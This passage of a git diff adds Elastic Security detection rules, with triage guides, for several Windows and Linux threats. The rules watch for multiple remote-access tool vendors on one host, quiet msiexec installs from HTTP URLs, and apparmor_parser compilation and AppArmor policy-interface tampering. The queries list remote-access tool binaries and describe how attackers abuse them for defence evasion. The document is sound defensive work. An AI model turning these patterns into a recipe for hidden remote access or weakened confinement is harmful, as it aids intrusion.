b/packages/security_detection_engine/kibana/security_rule/c3f8a1d2-4b5e-4c6f-9a8b-1e2d3f4a5b6c_1.json @@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a Windows host where two or more distinct remote monitoring and management (RMM) or remote-access tool vendors are observed starting processes within the same eight-minute window. Legitimate MSP environments may run multiple tools, but this pattern can also indicate compromise, shadow IT, or attacker staging of redundant access. Processes are mapped to a single vendor label so multiple binaries from the same vendor do not inflate the count.", + "from": "now-9m", + "interval": "8m", + "language": "esql", + "license": "Elastic License v2", + "name": "Multiple Remote Management Tool Vendors on Same Host", + "note": "## Triage and analysis\n\n### Investigating Multiple Remote Management Tool Vendors on Same Host\n\nThis rule aggregates process start events by `host.id`, host name, and a nine-minute time bucket. Data can come from\nElastic Defend, Sysmon, Winlogbeat, Windows Security / forwarded events, Microsoft Defender for Endpoint, SentinelOne,\nCrowdStrike FDR, or Elastic Endgame\u2014where ECS process fields are populated. Each known RMM-related process name maps\nto one **vendor** label (e.g. TeamViewer, AnyDesk, ScreenConnect). If **two or more different vendor labels** appear in\nthe same bucket, the rule signals.\n\n### Possible investigation steps\n\n- Open **Esql.vendors_seen** and **Esql.processes_name_values** on the alert to see which tools fired in the window.\n- Confirm whether the host is an MSP-managed jump box, helpdesk workstation, or lab where multiple RMM stacks are expected.\n- For servers or standard user endpoints, treat as higher risk: review install source, code signatures, and recent logons.\n- Correlate with other alerts (ingress tool transfer, suspicious scripting, new persistence) on the same `host.id`.\n- Check asset inventory and change tickets for approved RMM software.\n\n### False positive analysis\n\n- **MSP / IT tooling**: A technician machine with two approved agents (e.g. RMM + remote support) may match. Tune with\n host or organizational unit exceptions, or raise the vendor threshold if your environment standardizes on a known pair.\n- **Vendor rebrands or bundles**: Rare overlaps during migrations can briefly show two vendors; validate timeline and packages.\n\n### Response and remediation\n\n- If unauthorized or unexplained: isolate the host, inventory installed remote-access software, remove unapproved tools,\n and reset credentials that may have been exposed. Enforce a single approved RMM stack per asset class where possible.\n", + "query": "from logs-endpoint.events.process-*, endgame-*, logs-crowdstrike.fdr*, logs-m365_defender.event-*, logs-sentinel_one_cloud_funnel.*, logs-system.security*, logs-windows.sysmon_operational-*, logs-windows.forwarded*, winlogbeat-* metadata _id, _version, _index\n| where (host.os.type == \"windows\" or host.os.family == \"windows\")\n and event.category == \"process\"\n and event.type == \"start\"\n and process.name is not null\n| eval Esql.rmm_vendor = case(\n process.name == \"AeroAdmin.exe\", \"AeroAdmin\",\n process.name == \"AnyDesk.exe\", \"AnyDesk\",\n process.name == \"AteraAgent.exe\", \"Atera\",\n process.name == \"AweSun.exe\", \"AweSun\",\n process.name like \"aweray_remote*.exe\", \"AweSun\",\n process.name == \"apc_Admin.exe\", \"APC\",\n process.name == \"apc_host.exe\", \"APC\",\n process.name == \"BASupSrvc.exe\", \"BeyondTrust\",\n process.name == \"bomgar-scc.exe\", \"BeyondTrust\",\n process.name == \"Remote Support.exe\", \"BeyondTrust\",\n process.name == \"B4-Service.exe\", \"BeyondTrust\",\n process.name == \"CagService.exe\", \"BarracudaRMM\",\n process.name == \"domotzagent.exe\", \"Domotz\",\n process.name == \"domotz-windows-x64-10.exe\", \"Domotz\",\n process.name == \"dwagsvc.exe\", \"DWService\",\n process.name == \"DWRCC.exe\", \"DWService\",\n process.name like \"fleetdeck_commander*.exe\", \"FleetDeck\",\n process.name == \"getscreen.exe\", \"GetScreen\",\n process.name == \"g2aservice.exe\", \"GoTo\",\n process.name == \"GoToAssistService.exe\", \"GoTo\",\n process.name == \"gotohttp.exe\", \"GoTo\",\n process.name == \"GoToResolveProcessChecker.exe\", \"GoTo\",\n process.name == \"GoToResolveUnattended.exe\", \"GoTo\",\n process.name == \"ImperoClientSVC.exe\", \"Impero\",\n process.name == \"ImperoServerSVC.exe\", \"Impero\",\n process.name == \"ISLLight.exe\", \"ISLOnline\",\n process.name == \"ISLLightClient.exe\", \"ISLOnline\",\n process.name == \"jumpcloud-agent.exe\", \"JumpCloud\",\n process.name == \"level.exe\", \"Level\",\n process.name == \"LvAgent.exe\", \"Level\",\n process.name == \"LMIIgnition.exe\", \"LogMeIn\",\n process.name == \"LogMeIn.exe\", \"LogMeIn\",\n process.name == \"ManageEngine_Remote_Access_Plus.exe\", \"ManageEngine\",\n process.name == \"MeshAgent.exe\", \"MeshCentral\",\n process.name == \"meshagent.exe\", \"MeshCentral\",\n process.name == \"Mikogo-Service.exe\", \"Mikogo\",\n process.name == \"NinjaRMMAgent.exe\", \"NinjaOne\",\n process.name == \"NinjaRMMAgenPatcher.exe\", \"NinjaOne\",\n process.name == \"ninjarmm-cli.exe\", \"NinjaOne\",\n process.name == \"parsec.exe\", \"Parsec\",\n process.name == \"PService.exe\", \"Pulseway\",\n process.name == \"r_server.exe\", \"Radmin\",\n process.name == \"radmin.exe\", \"Radmin\",\n process.name == \"radmin3.exe\", \"Radmin\",\n process.name == \"rserver3.exe\", \"Radmin\",\n process.name == \"vncserver.exe\", \"RealVNC\",\n process.name == \"vncviewer.exe\", \"RealVNC\",\n process.name == \"winvnc.exe\", \"RealVNC\",\n process.name == \"ROMServer.exe\", \"RealVNC\",\n process.name == \"ROMViewer.exe\", \"RealVNC\",\n process.name == \"RemotePC.exe\", \"RemotePC\",\n process.name == \"RemotePCDesktop.exe\", \"RemotePC\",\n process.name == \"RemotePCService.exe\", \"RemotePC\",\n process.name == \"RemoteDesktopManager.exe\", \"Devolutions\",\n process.name == \"RCClient.exe\", \"RPCSuite\",\n process.name == \"RCService.exe\", \"RPCSuite\",\n process.name == \"RPCSuite.exe\", \"RPCSuite\",\n process.name == \"rustdesk.exe\", \"RustDesk\",\n process.name == \"rutserv.exe\", \"RemoteUtilities\",\n process.name == \"rutview.exe\", \"RemoteUtilities\",\n process.name == \"saazapsc.exe\", \"Kaseya\",\n process.name like \"ScreenConnect*.exe\", \"ScreenConnect\",\n process.name == \"ScreenConnect.ClientService.exe\", \"ScreenConnect\",\n process.name == \"Splashtop-streamer.exe\", \"Splashtop\",\n process.name == \"strwinclt.exe\", \"Splashtop\",\n process.name == \"SRService.exe\", \"Splashtop\",\n process.name == \"smpcview.exe\", \"Splashtop\",\n process.name == \"spclink.exe\", \"Splashtop\",\n process.name == \"rfusclient.exe\", \"Splashtop\",\n process.name == \"Supremo.exe\", \"Supremo\",\n process.name == \"SupremoService.exe\", \"Supremo\",\n process.name == \"Syncro.Overmind.Service.exe\", \"Splashtop\",\n process.name == \"SyncroLive.Agent.Runner.exe\", \"Splashtop\",\n process.name == \"Syncro.Installer.exe\", \"Splashtop\",\n process.name == \"tacticalrmm.exe\", \"TacticalRMM\",\n process.name == \"tailscale.exe\", \"Tailscale\",\n process.name == \"tailscaled.exe\", \"Tailscale\",\n process.name == \"teamviewer.exe\", \"TeamViewer\",\n process.name == \"ticlientcore.exe\", \"Tiflux\",\n process.name == \"TiAgent.exe\", \"Tiflux\",\n process.name == \"ToDesk_Service.exe\", \"ToDesk\",\n process.name == \"twingate.exe\", \"Twingate\",\n process.name == \"tvn.exe\", \"TightVNC\",\n process.name == \"tvnserver.exe\", \"TightVNC\",\n process.name == \"tvnviewer.exe\", \"TightVNC\",\n process.name == \"winwvc.exe\", \"TightVNC\",\n process.name like \"UltraVNC*.exe\", \"UltraVNC\",\n process.name like \"UltraViewer*.exe\", \"UltraViewer\",\n process.name like \"AA_v*.exe\", \"AnyAssist\",\n process.name == \"Velociraptor.exe\", \"Velociraptor\",\n process.name == \"ToolsIQ.exe\", \"ToolsIQ\",\n process.name == \"session_win.exe\", \"ZohoAssist\",\n process.name == \"Zaservice.exe\", \"ZohoAssist\",\n process.name == \"ZohoURS.exe\", \"ZohoAssist\",\n \"\"\n )\n| where Esql.rmm_vendor != \"\" and Esql.rmm_vendor is not NULL\n| stats Esql.vendor_count = count_distinct(Esql.rmm_vendor),\n Esql.vendors_seen = values(Esql.rmm_vendor),\n Esql.processes_executable_values = values(process.executable),\n Esql.first_seen = min(@timestamp),\n Esql.last_seen = max(@timestamp)\n by host.name, host.id\n| where Esql.vendor_count >= 2\n| sort Esql.vendor_count desc\n| keep host.id, host.name, Esql.*\n", + "references": [ + "https://attack.mitre.org/techniques/T1219/", + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-025a" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.first_seen", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.last_seen", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.processes_executable_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.vendor_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.vendors_seen", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c3f8a1d2-4b5e-4c6f-9a8b-1e2d3f4a5b6c", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: CrowdStrike", + "Data Source: Windows Security Event Logs", + "Data Source: Elastic Endgame", + "Data Source: Winlogbeat" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1219", + "name": "Remote Access Tools", + "reference": "https://attack.mitre.org/techniques/T1219/", + "subtechnique": [ + { + "id": "T1219.002", + "name": "Remote Desktop Software", + "reference": "https://attack.mitre.org/techniques/T1219/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 1 + }, + "id": "c3f8a1d2-4b5e-4c6f-9a8b-1e2d3f4a5b6c_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c9847fe9-3bed-4e6b-b319-f9956d6dd02a_2.json b/packages/security_detection_engine/kibana/security_rule/c9847fe9-3bed-4e6b-b319-f9956d6dd02a_2.json new file mode 100644 index 00000000000..372b875793b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c9847fe9-3bed-4e6b-b319-f9956d6dd02a_2.json @@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to install a file from a remote server using MsiExec. Adversaries may abuse Windows Installers for initial access and delivery of malware.", + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.forwarded*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Remote Install via MsiExec", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Remote Install via MsiExec\n\nMsiExec is a Windows utility for installing, maintaining, and removing software. Adversaries exploit it to execute malicious payloads by disguising them as legitimate installations. The detection rule identifies suspicious child processes spawned by MsiExec that initiate network activity, which is atypical for standard installations. By focusing on unusual executable paths and network connections, the rule helps uncover potential misuse indicative of malware delivery or initial access attempts.\n\n### Possible investigation steps\n\n- Review the process tree to identify the parent and child processes of the suspicious MsiExec activity, focusing on the process.entity_id and process.parent.name fields to understand the execution flow.\n- Examine the process.executable path to determine if it deviates from typical installation paths, as specified in the query, to assess the likelihood of malicious activity.\n- Analyze the network or DNS activity associated with the process by reviewing the event.category field for network or dns events, and correlate these with the process.name to identify any unusual or unauthorized connections.\n- Check the process.args for any unusual or suspicious command-line arguments that might indicate an attempt to execute malicious payloads or scripts.\n- Investigate the host's recent activity and security logs to identify any other indicators of compromise or related suspicious behavior, leveraging data sources like Elastic Defend, Sysmon, or SentinelOne as mentioned in the rule's tags.\n- Assess the risk and impact of the detected activity by considering the context of the alert, such as the host's role in the network and any potential data exposure or system compromise.\n\n### False positive analysis\n\n- Legitimate software installations or updates may trigger the rule if they involve network activity. Users can create exceptions for known software update processes that are verified as safe.\n- Custom enterprise applications that use MsiExec for deployment and require network access might be flagged. Identify these applications and exclude their specific executable paths from the rule.\n- Automated deployment tools that utilize MsiExec and perform network operations could be misidentified. Review these tools and whitelist their processes to prevent false alerts.\n- Security software or system management tools that leverage MsiExec for legitimate purposes may cause false positives. Confirm these tools' activities and add them to an exclusion list if necessary.\n- Regularly review and update the exclusion list to ensure it reflects the current environment and any new legitimate software that may interact with MsiExec.\n\n### Response and remediation\n\n- Isolate the affected system from the network immediately to prevent further malicious activity and lateral movement.\n- Terminate the suspicious child process spawned by MsiExec to halt any ongoing malicious operations.\n- Conduct a thorough scan of the affected system using updated antivirus or endpoint detection and response (EDR) tools to identify and remove any malicious payloads or remnants.\n- Review and analyze the process execution and network activity logs to identify any additional indicators of compromise (IOCs) and assess the scope of the intrusion.\n- Reset credentials and review access permissions for any accounts that may have been compromised or used during the attack.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.\n- Implement enhanced monitoring and detection rules to identify similar threats in the future, focusing on unusual MsiExec activity and network connections.", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"msiexec.exe\" and process.args : (\"-i*\", \"/i*\", \"-p*\", \"/p*\") and process.command_line : \"*http*\" and\n process.args : (\"/qn\", \"-qn\", \"-q\", \"/q\", \"/quiet\") and\n process.parent.name : (\"sihost.exe\", \"explorer.exe\", \"cmd.exe\", \"wscript.exe\", \"mshta.exe\", \"powershell.exe\", \"wmiprvse.exe\", \"pcalua.exe\", \"forfiles.exe\", \"conhost.exe\") and\n not process.command_line : (\"*--set-server=*\", \"*UPGRADEADD=*\" , \"*--url=*\",\n \"*USESERVERCONFIG=*\", \"*RCTENTERPRISESERVER=*\", \"*app.ninjarmm.com*\", \"*zoom.us/client*\",\n \"*SUPPORTSERVERSTSURI=*\", \"*START_URL=*\", \"*AUTOCONFIG=*\", \"*awscli.amazonaws.com*\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c9847fe9-3bed-4e6b-b319-f9956d6dd02a", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.007", + "name": "Msiexec", + "reference": "https://attack.mitre.org/techniques/T1218/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "c9847fe9-3bed-4e6b-b319-f9956d6dd02a_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d19a2399-f8e2-4b10-80d8-a561ce9d24d1_1.json b/packages/security_detection_engine/kibana/security_rule/d19a2399-f8e2-4b10-80d8-a561ce9d24d1_1.json deleted file mode 100644 index 39ca8b9a3a2..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/d19a2399-f8e2-4b10-80d8-a561ce9d24d1_1.json +++ /dev/null @@ -1,106 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects the creation of a symbolic link from a system binary to a suspicious and writable location. This activity may indicate an attacker's attempt to evade detection by behavioral rules that depend on predefined process parent/child relationships. By executing the symlinked variant of a binary instead of the original, the attacker aims to bypass these rules. Through the new_terms rule type, this rule can identify uncommon parent processes that may indicate the presence of a malicious symlink.", - "from": "now-9m", - "history_window_start": "now-10d", - "index": [ - "logs-endpoint.events.process*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "System Binary Symlink to Suspicious Location", - "new_terms_fields": [ - "host.id", - "process.parent.name" - ], - "query": "host.os.type:linux and event.category:process and event.type:start and event.action:exec and process.parent.executable:* and\n(process.name:ln or process.name:busybox and process.args:ln or process.name:cp and process.args:--symbolic-link) and\nprocess.args:(\n (\n /bin/* or /lib/* or /lib64/* or /sbin/* or /usr/bin/* or /usr/lib/* or /usr/lib64/* or /usr/local/bin/* or\n /usr/local/lib/* or /usr/local/lib64/* or /usr/local/sbin/* or /usr/sbin/*\n ) and (\n /*/.* or /dev/shm/* or /home/* or /root/* or /tmp/* or /var/tmp/*\n ) and\n not (/usr/bin/coreutils or /tmp/mkinitcpio* or /var/tmp/dracut* or /var/tmp/mkinitramfs*)\n)\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.executable", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "d19a2399-f8e2-4b10-80d8-a561ce9d24d1", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1574", - "name": "Hijack Execution Flow", - "reference": "https://attack.mitre.org/techniques/T1574/" - }, - { - "id": "T1202", - "name": "Indirect Command Execution", - "reference": "https://attack.mitre.org/techniques/T1202/" - }, - { - "id": "T1564", - "name": "Hide Artifacts", - "reference": "https://attack.mitre.org/techniques/T1564/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 1 - }, - "id": "d19a2399-f8e2-4b10-80d8-a561ce9d24d1_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d26331be-affe-46b2-bf4e-203d0e2d364c_1.json b/packages/security_detection_engine/kibana/security_rule/d26331be-affe-46b2-bf4e-203d0e2d364c_1.json new file mode 100644 index 00000000000..3f9fddca1ad --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d26331be-affe-46b2-bf4e-203d0e2d364c_1.json @@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the execution of \"apparmor_parser\" using the \"-o\" option to write a compiled AppArmor profile to an output file. This functionality is normally used by system administration tools or package installation scripts when building or loading AppArmor policies. In adversarial scenarios, attackers may use \"apparmor_parser\" to compile custom AppArmor profiles that can later be loaded into the kernel through AppArmor policy management interfaces. Malicious profiles may weaken security controls, alter the behavior of privileged programs, or assist in exploitation chains involving AppArmor policy manipulation.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process*", + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-sentinel_one_cloud_funnel.*", + "logs-auditd_manager.auditd-*", + "auditbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "AppArmor Profile Compilation via apparmor_parser", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AppArmor Profile Compilation via apparmor_parser\n\nThis alert flags a Linux process using apparmor_parser to write a compiled AppArmor policy to disk, an action administrators and package scripts use but adversaries can abuse to stage policy changes. An attacker with root access can compile a custom profile that grants a trojanized service broader file or capability access, then load it to weaken confinement and support privilege escalation or stealthy persistence.\n\n### Possible investigation steps\n\n- Review the full command line, parent and ancestor process chain, executing user, tty or session, and working directory to determine whether the activity came from expected package management or configuration tooling versus an interactive shell.\n- Identify the source profile and output file paths, then inspect the profile for broad file access, dangerous capability grants, unconfined transitions, or complain/disable settings that would weaken confinement for sensitive binaries or services.\n- Correlate nearby events for writes under AppArmor policy directories, subsequent policy loads or reloads, package installation actions, and restarts of the targeted application to confirm whether the compiled profile was actually deployed.\n- Compare the activity against host and peer-system baselines and validate it with change records, deployment jobs, or package updates tied to the same account or system to quickly distinguish administrative maintenance from anomalous behavior.\n- If the execution is not authorized, preserve the generated profile and related scripts, restore affected policy files from a known-good source, and review recent privileged activity on the host for additional persistence or defense-evasion changes.\n\n### False positive analysis\n\n- Operating system package installation or upgrade can invoke apparmor_parser with -o to precompile a vendor profile during a post-install action; verify this by reviewing the parent process and nearby package-management activity for an authorized update at the same time.\n- A system administrator may compile a new or modified local AppArmor profile while hardening or troubleshooting a service; verify the executing user, source and output file paths, and whether the change aligns with approved maintenance or documented policy updates.\n\n### Response and remediation\n\n- Isolate the affected Linux host from the network and stop any service whose confinement was altered if the compiled profile was loaded or written into `/etc/apparmor.d/` or AppArmor cache directories, to prevent further policy abuse.\n- Preserve the malicious source profile, compiled output, invoking script, and shell history for evidence, then delete unauthorized files from `/etc/apparmor.d/`, `/etc/apparmor.d/disable/`, and cache paths and unload the rogue policy with approved AppArmor administration commands.\n- Remove attacker persistence by reviewing and cleaning systemd unit files, timers, cron entries, package maintainer scripts, login startup files, and sudoers changes that call `apparmor_parser` or restore the profile at boot.\n- Reset or revoke credentials used on the host, including root and sudo-capable accounts, service account secrets, and unauthorized `authorized_keys`, if the attacker had interactive access or modified privileged services.\n- Restore AppArmor policy files, affected binaries, and related service configurations from trusted packages, configuration management, or a gold image, then reload AppArmor in enforce mode and confirm the targeted program is confined by the expected profile.\n- Escalate to incident response immediately if the custom profile targeted `sshd`, `sudo`, container runtimes, web-facing daemons, or appears on multiple hosts, and harden the environment by limiting write access to AppArmor policy paths, alerting on future `apparmor_parser -o` use outside approved package activity, and enforcing change control for policy updates.\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\", \"start\", \"ProcessRollup2\", \"executed\", \"process_started\") and\nprocess.name == \"apparmor_parser\" and process.args in (\"--ofile*\", \"-o*\", \"--output*\")\n", + "references": [ + "https://cdn2.qualys.com/advisory/2026/03/10/crack-armor.txt", + "https://blog.qualys.com/vulnerabilities-threat-research/2026/03/12/crackarmor-critical-apparmor-flaws-enable-local-privilege-escalation-to-root" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "d26331be-affe-46b2-bf4e-203d0e2d364c", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Auditd Manager", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "d26331be-affe-46b2-bf4e-203d0e2d364c_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d32f0c27-8edb-4bcf-975e-01696c961e08_1.json b/packages/security_detection_engine/kibana/security_rule/d32f0c27-8edb-4bcf-975e-01696c961e08_1.json new file mode 100644 index 00000000000..bedbab3bf2d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d32f0c27-8edb-4bcf-975e-01696c961e08_1.json @@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies access to AppArmor kernel policy control interfaces through the .load, .replace, or .remove files under /sys/kernel/security/apparmor/. These special files are used to load, modify, or remove AppArmor profiles and are rarely accessed during normal system activity outside of policy administration. Reads or writes to these interfaces may indicate legitimate security configuration changes, but can also reflect defense evasion, unauthorized policy tampering, or the installation of attacker-controlled profiles. This detection is especially valuable on systems where AppArmor policy changes are uncommon or tightly controlled.", + "from": "now-9m", + "index": [ + "logs-auditd_manager.auditd-*", + "auditbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "AppArmor Policy Interface Access", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AppArmor Policy Interface Access\n\nThis rule detects reads, writes, or deletions against the Linux AppArmor policy control files that load, replace, or remove profiles, actions that directly change how the kernel restricts processes. That matters because unauthorized access to these interfaces can disable enforcement or install permissive rules that hide malicious activity; for example, an intruder with elevated privileges might replace a profile protecting a web server so a dropped backdoor can run and touch sensitive files without confinement.\n\n### Possible investigation steps\n\n- Determine whether the access coincides with an approved AppArmor administration task by validating the initiating account, privilege escalation history, maintenance windows, and any related change or deployment records for the host.\n- Review the full execution lineage around the event to confirm whether the interface was touched by expected policy management activity such as package updates or configuration automation versus an interactive shell, ad hoc script, or remote session.\n- Inspect recent changes to AppArmor profile files and deployment artifacts under standard policy locations to identify which profile was loaded, replaced, or removed and whether the resulting policy became weaker or disabled confinement for sensitive services.\n- Correlate the activity with nearby authentication, sudo, process execution, and network events on the same system to assess whether the policy modification was part of normal administration or followed potentially malicious hands-on-keyboard behavior.\n- If the change is not authorized, preserve the modified policy artifacts and relevant host evidence, then restore known-good AppArmor profiles from a trusted source and verify enforcement is active to prevent further defense evasion.\n\n### False positive analysis\n\n- Approved system maintenance such as package updates, service installation, or boot-time policy initialization can legitimately access AppArmor `.load` or `.replace`, so verify the parent process and command line map to expected package management or startup activity during a documented change window.\n- An administrator may manually reload, 